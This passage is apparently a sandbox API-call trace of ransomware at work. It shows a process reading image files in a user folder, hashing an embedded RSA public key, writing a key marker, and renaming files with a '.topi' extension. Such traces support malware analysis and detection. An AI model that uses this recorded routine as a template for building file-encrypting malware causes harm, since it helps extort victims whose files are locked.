hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.705] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.705] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.705] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.705] CloseHandle (hObject=0x6a8) returned 1 [0096.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0096.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.716] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\dsVuGwo_lw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\dsvugwo_lw.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\dsVuGwo_lw.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\dsvugwo_lw.bmp.topi")) returned 1 [0096.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.717] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.718] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b152810, ftCreationTime.dwHighDateTime=0x1d5be4a, ftLastAccessTime.dwLowDateTime=0x13cd52b0, ftLastAccessTime.dwHighDateTime=0x1d5b990, ftLastWriteTime.dwLowDateTime=0x13cd52b0, ftLastWriteTime.dwHighDateTime=0x1d5b990, nFileSizeHigh=0x0, nFileSizeLow=0x13c68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DuNu8NvReY7SRV2A.png", cAlternateFileName="DUNU8N~1.PNG")) returned 1 [0096.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.718] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.718] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\DuNu8NvReY7SRV2A.png") returned=".png" [0096.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\DuNu8NvReY7SRV2A.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\dunu8nvrey7srv2a.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.718] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=81000) returned 1 [0096.718] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.721] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x13c42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.721] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.722] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.722] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x13c68, lpOverlapped=0x0) returned 1 [0096.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.723] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.723] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.723] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.724] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.724] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.724] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.724] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.724] GetLastError () returned 0x0 [0096.724] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.724] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.724] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.724] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.724] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x13c70) returned 0x9a06a00 [0096.725] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02c18 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02c60 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ac0 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b08 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.725] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b08 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4af0 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.726] GetCurrentThreadId () returned 0x8c4 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8580 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.727] GetCurrentThreadId () returned 0x8c4 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.727] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b08 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b20 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.728] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.728] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.729] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.729] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02c60 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.730] HeapFree 